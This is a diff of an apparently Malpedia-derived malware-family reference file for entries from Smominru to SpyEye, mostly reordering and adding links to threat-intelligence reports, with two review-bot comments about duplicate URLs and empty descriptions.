- "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
+ "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/",
+ "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators"
 ],
 "synonyms": [
 "Ismo"
@@ -44590,8 +46661,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32",
- "https://www.youtube.com/watch?v=7gCU31ScJgk",
- "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/"
+ "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/",
+ "https://www.youtube.com/watch?v=7gCU31ScJgk"
 ],
 "synonyms": [],
 "type": []
@@ -44617,31 +46688,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake", - "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", - "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://twitter.com/bad_packets/status/1270957214300135426", - "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", - "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", - "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", - "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://www.goggleheadedhacker.com/blog/post/22", - "https://twitter.com/milkr3am/status/1270019326976786432", - "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", - "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", - "https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/", - 
"https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/", + "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", + "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", + "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", + "https://twitter.com/bad_packets/status/1270957214300135426", + "https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md", + "https://twitter.com/milkr3am/status/1270019326976786432", + "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", + "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", + 
"https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", + "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", + "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md" + "https://www.goggleheadedhacker.com/blog/post/22" ], "synonyms": [ "EKANS", 
@@ -44657,18 +46728,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
 "https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
 "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
 "https://twitter.com/VK_Intel/status/1191414501297528832",
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/"
+ "https://intel471.com/blog/a-brief-history-of-ta505"
 ],
 "synonyms": [],
 "type": []
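Review bot: The new side of the Snatch hunk still lists the same Intel 471 article under two hosts, `https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` and `https://intel471.com/blog/a-brief-history-of-ta505`, so any consumer that de-duplicates refs by exact string counts it twice. The Sorgu and Spaceship hunks further down carry the same pattern (symantec.com alongside symantec-blogs.broadcom.com, www2.fireeye.com alongside mandiant.com). Keeping only the current canonical URL, or marking the legacy one as an alias of it, would avoid the double counting without losing the reference.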
@@ -44681,10 +46752,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto",
+ "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
+ "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/",
 "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
 "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html",
- "https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf",
- "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/"
+ "https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -44697,11 +46769,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader",
- "https://www.youtube.com/watch?v=k3sM88o_maM",
 "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/",
- "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/",
+ "https://www.youtube.com/watch?v=k3sM88o_maM",
 "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/",
- "https://twitter.com/VK_Intel/status/898549340121288704"
+ "https://twitter.com/VK_Intel/status/898549340121288704",
+ "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -44729,12 +46801,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
- "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef",
 "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
 "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
- "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef"
+ "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
+ "https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072"
 ],
 "synonyms": [
 "Ursnif"
@@ -44757,6 +46830,19 @@
 "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf",
 "value": "Snojan"
 },
+ {
+ "description": "Information stealer, written in Rust.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer",
+ "https://github.com/Finch4/Malware-Analysis-Reports/blob/master/SnowFlake%20Stealer/SnowFlake%20Stealer%20Analysis.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7ddfdf14-ec97-48ea-88a6-055147583dc3",
+ "value": "SnowFlake Stealer"
+ },
 {
 "description": "",
 "meta": {
@@ -44802,12 +46888,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/",
- "https://twitter.com/VK_Intel/status/1201584107928653824",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://twitter.com/VK_Intel/status/1201584107928653824",
+ "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -44820,9 +46906,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot",
- "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
 "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
+ "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
 "https://www.youtube.com/watch?v=CAMnuhg-Qos"
 ],
 "synonyms": [],
@@ -44849,12 +46935,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot",
 "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
- "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
- "https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
 "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018"
 ],
 "synonyms": [
 "BIRDDOG",
@@ -44871,11 +46957,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster",
 "https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
 "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://securelist.com/apt-trends-report-q1-2021/101967/"
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks"
 ],
 "synonyms": [
 "DelfsCake",
@@ -44892,9 +46978,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot",
+ "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/",
 "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/",
- "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/",
- "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/"
+ "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/"
 ],
 "synonyms": [
 "Napolar"
@@ -44905,28 +46991,29 @@ "value": "Solarbot" }, { - "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", + "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker\u2019s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims\u2019 web browsers. 
Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", - "https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", - "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer", - "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more", - "https://unit42.paloaltonetworks.com/solarmarker-malware/", - "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf", + "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise", "https://twitter.com/MsftSecIntel/status/1403461397283950597", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/", - "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction", - "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", - "https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer", - "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html", - "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/", "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/", - "https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire", + "https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/", 
"https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/",
+ "https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire",
+ "https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer",
+ "https://unit42.paloaltonetworks.com/solarmarker-malware/",
+ "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/",
+ "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html",
+ "https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
+ "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
+ "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf",
 "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://embee-research.ghost.io/shodan-censys-queries/",
+ "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
+ "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
+ "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more"
 ],
 "synonyms": [
 "Jupyter",
@@ -44983,9 +47070,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano",
+ "https://3xp0rt.xyz/lpmkikVic",
 "https://github.com/Alexuiop1337/SoranoStealer",
- "https://github.com/3xp0rt/SoranoStealer",
- "https://3xp0rt.xyz/lpmkikVic"
+ "https://github.com/3xp0rt/SoranoStealer"
 ],
 "synonyms": [],
 "type": []
@@ -45026,8 +47113,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] @@ -45056,15 +47143,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", - "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx", + "https://attack.mitre.org/wiki/Software/S0157", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf" ], "synonyms": [ "denis" 
@@ -45079,8 +47166,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf" ], "synonyms": [], "type": [] @@ -45093,11 +47180,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark", - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", - "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", - "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one" + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] 
@@ -45136,10 +47223,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark_rat", - "https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/", - "https://blog.exatrack.com/melofee/", "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", - "https://github.com/XZB-1248/Spark" + "https://asec.ahnlab.com/en/52899/", + "https://blog.exatrack.com/melofee/", + "https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/", + "https://github.com/XZB-1248/Spark", + "https://asec.ahnlab.com/ko/56715/" ], "synonyms": [], "type": [] @@ -45152,8 +47241,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door", - "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf", - "https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" + "https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/", + "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" ], "synonyms": [ "FamousSparrow" @@ -45176,6 +47265,19 @@ "uuid": "e4dce19f-bb8e-4ea1-b771-58b162946f29", "value": "Spartacus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectralviper", + "https://www.elastic.co/fr/security-labs/elastic-charms-spectralviper" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f9ee4dc-725e-4a8e-8c10-a013f6949b2d", + "value": "SPECTRALVIPER" + }, { "description": "Mixed RAT and Botnet malware sold in underground forums. In march 2021 it was advertised with the Spectre 2.0, it reached version 3 in June 2021 and then quickly version 4. This crimeware tool was being abused in malicious campaigns targeting European users in September 2021.", "meta": { 
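Review bot: The new SPECTRALVIPER entry is added with `"description": ""` even though it cites an Elastic Security Labs write-up, so consumers that display or search cluster descriptions will show an empty node for it. A one-sentence summary taken from the referenced report, in the same `"According to <vendor>, …"` form the neighbouring entries use, would make the entry useful on its own; the STRATOFEAR entry in a later hunk of this patch has the same gap. If the empty string is intentional output of what appears to be a Malpedia-driven import, stating that in the commit message would stop reviewers flagging it on every regeneration.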
@@ -45233,9 +47335,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", "https://twitter.com/nahamike01/status/1471496800582664193?s=20", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf" ], "synonyms": [], "type": [] @@ -45248,12 +47350,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", - "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", - "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", "https://github.com/MinervaLabsResearch/SporaVaccination", - "http://malware-traffic-analysis.net/2017/01/17/index2.html", + "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", + "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", + "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", - "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas" + "http://malware-traffic-analysis.net/2017/01/17/index2.html" ], "synonyms": [], "type": [] 
@@ -45278,14 +47380,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", - "https://vms.drweb.com/virus/?i=23648386", + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf" + "https://vms.drweb.com/virus/?i=23648386", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/" ], "synonyms": [], "type": [] 
@@ -45298,18 +47401,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye", - "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", - "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html", - "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", - "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393", - "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/", "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/", - "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot" + "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", + "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", + 